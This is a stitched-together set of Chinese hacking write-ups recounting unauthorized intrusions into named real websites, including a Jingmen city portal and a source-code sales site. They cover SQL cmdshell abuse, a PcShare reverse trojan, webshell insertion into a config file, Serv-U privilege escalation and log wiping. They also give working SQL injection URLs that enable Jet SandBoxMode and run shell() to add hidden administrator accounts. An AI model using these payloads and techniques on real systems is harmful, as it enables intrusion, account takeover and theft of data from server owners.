一切OK后我习惯的net user了下，我傻眼了，居然还是原来的那几个用户…提权又失败了？难道我RP差到极端了？难道创建的cmdshell函数有问题，不能执行命令？NND的那几个帐户我越看越不顺眼，顺手执行了个（download是系统的一个帐户名）：
select cmdshell('net user download /del')

再回头net user一看，download用户果然没了，难道只能del不能add？我不信这个邪了，又换个用户名oldjun$试了下，依旧没效果，看来这个管理员功夫深厚啊…

当然，这么点困难难不倒我啦，既然有这么大的权限，我干什么不行啊…究竟是什么问题，待会就晓得啦。

三、 反向木马提权：
因为手头上没免杀的鸽子，于是找个黑防的Pcshare凑合凑合，配置好客户端aa.exe以后，上传到服务器的C盘，再在cmdshell中执行下，成功了：

几秒钟后，我的小肉鸡就上线了，我迫不及待的打开超级终端，输入：
Net user oldjun oldjun /add 后出现如下提示：

于是，我一下子清醒了，难怪这么多次显示成功却没成功，看来不是我人品不济啊，再试试：

试了这么多次，终于成功了，这管理员也太变态了，不好好的设置服务器权限，居然在组策略里启用了“密码必须符合复杂性要求。”这分明是为难自己人么？那么长的密码不嫌难记啊:-)

什么是密码必须符合复杂性要求？组策略里有说明：
此安全设置确定密码是否必须符合复杂性要求。
如果启用此策略，密码必须符合下列最低要求:
不能包含用户的帐户名，不能包含用户姓名中超过两个连续字符的部分
至少有六个字符长
包含以下四类字符中的三类字符:
英文大写字母(A 到 Z)
英文小写字母(a 到 z)
10 个基本数字(0 到 9)
非字母字符(例如 !、$、#、%)
在更改或创建密码时执行复杂性要求。

总结：

一个下午的研究多少也有点收获…感觉要写点给大家，一是告诉大家提权不要吊死在一棵树上，条条大道通罗马；二是大家提权的时候一定得注意这些细节别急躁，不然本来的成功也变成失败啦；第三，对于系统的防护来讲，启用“密码必须符合复杂性要求。”还是蛮对的，至少可以防住一些菜菜…

http://www.oldjun.com/blog/index.php/archives/27/

　　寻找漏洞篇

　　荆网，荆门市的门户网站，首页上有二手供求、房产信息、图书影视、人才招聘、社区等20几个栏目。新闻系统全部是静态页面，注入是不可能的，后台好像也被修改了，用扫描后台的工具扫了一遍，没有结果，用Google搜索也没找出来，看来我们只能从其它的方面入手了。

　　一般的大型网站都有自己的流量统计程序，方便管理员和网站经营者查看网站的流量，为网站推广提供一定的依据。下面，我们来找找看荆网有没有自己的统计程序，用Google搜索site:cnjm.cn inurl:count，如图1所示。

　　荆网果然有自己的统计程序，还是IT学习者网站访问统计系统。前段时间，这套程序暴出了后台拿WebShell的漏洞，但前提是要拿到管理员密码。一般这种门户网站，管理员都会改密码的，先试下看看吧。这套程序的默认密码是ITlearner，在密码处输入ITlearner，返回密码错误，果然改密码了。习惯性地试了下网站的域名cnjm，竟然成功进去了，如图2所示。

　　拿WebShell篇

　　马上到网上下载了一套IT学习者网站访问统计程序。利用这套程序的漏洞拿WebShell，网上有很多教程，但是我还没有拿过，先在本机上搭建好程序的运行环境，然后再按网上讲的方法进行测试。一般有什么漏洞出来，最好是自己下载一套程序，在本机上测试，只有先拿下自己机子上的程序，才可能顺利拿到服务器上的程序，自己在本机测试也会对程序的漏洞理解更深，有助于我们进一步学习。在本机测试成功拿到WebShell后，我明白这套程序会把修改配置的内容写入config.asp文件，只要我们在修改配置里插入一句话木马就可以搞定了，因为修改配置里限制了文本框的大小，所以我们要把源代码保存一下。搜索“默认为100条”关键字，把这行文本框的maxlength的值修改为100，value的值修改为“100%>

　　拿服务器篇

　　成功连接后，我上传了老兵的站长助手，先看看服务器的权限设得如何，如图4所示。Wscript.shell和FSO组件都能用，而且C盘还可以浏览，应该可以拿下来。上传net.exe和netstat.exe两个工具到C:\Documents and Settings\All Users\Documents目录下，这个目录默认是everyone完全控制的。查看了一下端口列表，3389终端端口开了，还有Serv-U的本地43958端口。在本地用FTP连接，发现Serv-U是6.0版的，而且3389也可以成功连接。了解了这些情况，现在我们只要加个管理员就行了。上传Serv-U的本地提权工具，马上加了一个管理员，用远程桌面连接器成功登录，如图5所示。

　　IIS管理器把网站全部显示出来了，主站www.cnjm.cn也在其中。到此为止，这次渗透就成功完成了，拿下了荆网的服务器。接下来，删除账号，清除日志，然后给管理员留了言，我就下了。

　　渗透总结

　　这次入侵，我利用一个统计程序的小漏洞就轻松搞定了一个市的门户网站。管理员们要注意了，在使用密码的时候，不要用过于简单，用域名做密码，别人一猜就能猜出来，你方便了，那入侵者就更方便了!

题外话:
最近想做几个垃圾站玩玩。可手上又没有啥好程序。郁闷。
那些网上免费的程序又没多少好玩意。
百度看看网上谁卖程序。方便的话,搞几个下来玩玩好了。

一:小碰头:
百度上找了一会, http://www.200ym.cn/
看到这个站上有几个我喜欢的程序。
咋办?试试看吧。

当时一看这站,哪像个出售源码程序的站。这么丑。用的啥系统我想大家不说我说也知道了吧。
当然,人家手上既然有这么多源码,想必也是通过自己的入侵手段搞来的。
那他的主站也基本上就不需要看了。

随便在一个url上添加个单引号出现了这个。加了防注入了.
算了。不错主站入手了。
拿出我们最喜欢的东西吧。
http://www.seologs.com/ip-domains.html
(http://www.114best.com/ip)
查到同一服务器上有这些站。

有53个站。心里开心了。旁注有望啊。
从主站也得知这些网站都是网站管理员的出售中的程序。
所以给他们分配的也都是2级域名。大家会想了。2级域名?会不会如果直接搞定一个webshell,就可以得到所有程序呢?因为他们这些演示站点或许会是在主站的下级目录吧。
当初我也这么想的。先不说这个了。
下面我们开始吧。
我首先瞄准了http://lianyun.200ym.cn/

大家看到了什么?
对,论坛。而且是动网7.1的。

不是吧?这么简单就可以搞到一个webshell了？还卖源码呢.唉。
动网默认的密码就进去了。
咱们登陆后台拿webshell吧。
Dvbbs7.1首先考虑后台导出模板然后备份拿webshell.

然后就导出了。问题也就来了。

去看看备份数据库那里能否备份。是可以备份的。
导出模板不可以。上传文件总还是会允许的吧?

结果无论我上传什么类型的文件。无论我怎么伪造文件。都显示这个。难怪管理员会这么放
心的把密码设为默认的。我想大概是方便购买的人查看吧。
想了想。要是这样的话?
那不会所有的2级网站都是这样吧？
我是个不服输的人。大不了一个一个试。不就53个网站么？
经历了“无数”的数据库只读,无写入权限等问题。几乎所有的2级都是这样。看来管理员还是挺有意识。尴尬了。怎么办？不会就这么放弃吧。
二：峰回路转。
我没有放弃。接着又找到一动网7.1默认密码。
http://haoteacher.200ym.cn/BBS/

哈哈。百密终有一疏啊。
这么多的站。总算还有一个没把权限给卡住啊。
成功导出后。然后通过备份拿到一个webshell.

终于叹了口气。搞了大半天终于拿到了一个webshell..
提权吧。
无ws
无任何第3方可以直接利用软件。
……Aspx的马马运行不了(其实服务器是支持.net的)。
跳转的d:/web/ 跳转不了……
唉。提权无望啊。
又不知道其他目录的名称。社工了好几个,都不能跳转。
想了想,同级目录会不会允许跳转呢?带着侥幸的心理尝试了下。
大家会说了,根本就不知道其他的网站目录
其实要想知道一个同级目录也不难。刚刚咱们不是还有个动网默认密码的没搞下来么?
大家有没想到什么？动网后台在数据处理的系统信息检测可以看到网站的路径的。呵呵。对了。(其实还有的其他几个站点可以通过aspcheck.asp来得知的。)

哈哈。跳转成功。但也就只能跳这个三级目录。不过不要紧。
舒服的东西在下面呢。
习惯性的看了下数据库连接文件。
strconn = "driver={sql server};server=(local);uid=xxx;pwd=xxx;database=xxx"
呵呵。是个SQL的数据库。
试试是否可以上传文件到这个站。

唉。权限还是不够啊。
那就用SQLtool直接连接吧。我晕。

怎么可能呢?密码难道错误?不会啊。重新找了一下数据库连接我文件。也就那么一个。那到
底怎么回事呢?
很明显,禁止了外部连接1433端口。如果是这样的话那好办。
传个SQLrootkit就可以了。
事实证明了这一点。我用webshell自带的SQL连接工具连接了。
在我意料之中。这仅仅是个db权限的数据库而已。

不过db权限的数据库也暂时够我们用了。

Db权限的数据库？大家想到了什么？呵呵。对了。

Db 权限的注入点可以列目录啊。既然服务器允许我们跳转到3级目录(这只是暂时的猜想,

因为毕竟暂时只有一个3级目录被我们跳转了)。

XP_CMDSHELL............. 存在!
SP_OACREATE............. 存在!
XP_REGWRITE............. 存在!
XP_SERVICECONTROL 存在!
经查询。这些都还在。那就好办了。

直接构造注入点吧。

<!--#include file="xx.asp"-->
<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL =
"select * from admin where id="
& id
rs.open strSQL,conn,1,3
rs.close
%>
这里的admin必须是一个存在的表名。
我们可以通过SQL连接工具执行SQL命令查询。
select name from sysobjects where type='U'
查询出我们需要的表名。或者我也在 ../
conn/encode.asp
这个文件里找到这一句。sql="select count (*) from login where id="&cint(myid)
很明显。这里的login就可以被我们用上。
strSQL = "select * from login where id=" & id 我们构造出这样的语句替换到上面的代码中。
至此。终于有了突破。成功构造了注入点。

呵呵。能够列出目录了。
我们现在会想。要想搞到3389的终极权限。现在只能靠1433这个口子了。
既然服务器支持我们跳转到某些目录。那咱们一一试过去不就行了。
事情证明。找1433实在是太辛苦了。有的人大概会一个目录一个目录的去找吧。但有的网站只是access的。
其实这也是我当初的做法。后来兄弟可酷可乐告诉我。直接列出这个目录d:\Program Files\Microsoft SQL Server\MSSQL\Data\
数据库的前缀基本上是有规律的。那就是跟二级域名很相似。直接去找那些目录就可以了。这样就可以省下很多事。
找到目录后,一一的在webshell上跳转。很顺利。在通过几次观察后。
管理员把SQL帐户设置的很有规律。
aaa1 aaa2 aaa3 aaa4 aaa5 ……
而密码有都是一样的。我这个人就是懒,喜欢偷懒。那这些用户中会否有一个是SA的权限呢？赶紧去一个一个试。我从aaa1试到aaa16。

呵呵。
恭喜！SQL SERVER最高权限。

还等什么？赶紧”net user” 吧。

xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）

郁闷了。出现了这样的情况。
没有足够的权限创建进程。
难道不是SA权限? SA都被降权了?
c:\windows\system32\cmd.exe没有被删啊
那怎么办？
想要用SQL查询分析器连接吧，
但1433又不对外开放。外部不可以连接。
想把服务器上的1433端口转发到本地吧。又无ws.
网上查了查资料。
用沙盒模式提权来试下

再来构造个个SA的注入点。
这不难。继续构造。再次执行select name from sysobjects where type='U'查询myadmin这个数据库中的表名。

好了。成功构造出来了。接着就是沙盒模式提权了。
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner$ aloner /add")');--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner$ /add")');--

返回正常。说明成功了。

或者用HDSI 执行下面这些SQL命令。

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner aloner /add")');

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner /add")');

至此,总算搞到system权限。顺便搞了几个程序。
总结一下:
这次入侵没什么技术性。
咱们渗透一个站点的时候,最重要的是不断的尝试+思路。
这次渗透主要还是大胆的实验和假设加上管理员的疏忽吧。演示站点的权限没有设置好。
本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处：http://www.520hack.com/Article/Text4/200805/10052.html